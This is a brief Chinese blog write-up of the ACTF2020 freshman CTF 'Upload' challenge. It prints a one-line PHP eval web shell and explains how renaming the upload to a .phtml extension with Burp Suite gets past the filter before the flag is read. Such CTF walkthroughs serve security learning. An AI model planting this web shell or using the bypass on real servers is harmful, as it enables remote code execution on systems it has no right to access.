Vinson's Blog

记录生活中的点点滴滴

0%

ACTF2020新生赛Upload

发一些入门的CTF题目(Upload)

打开题目靶场发现是一个上传文件
题目
尝试上传一句话木马

1
<?php @eval($_POST[cmd]);?>

提示报错
提示
我们利用bp抓包,更改后缀名为phtml
上传绕过不懂的可以看这个链接
转载https://blog.csdn.net/qq_38680693/article/details/81700378
bp
访问网址利用hackbar工具查看flag
flag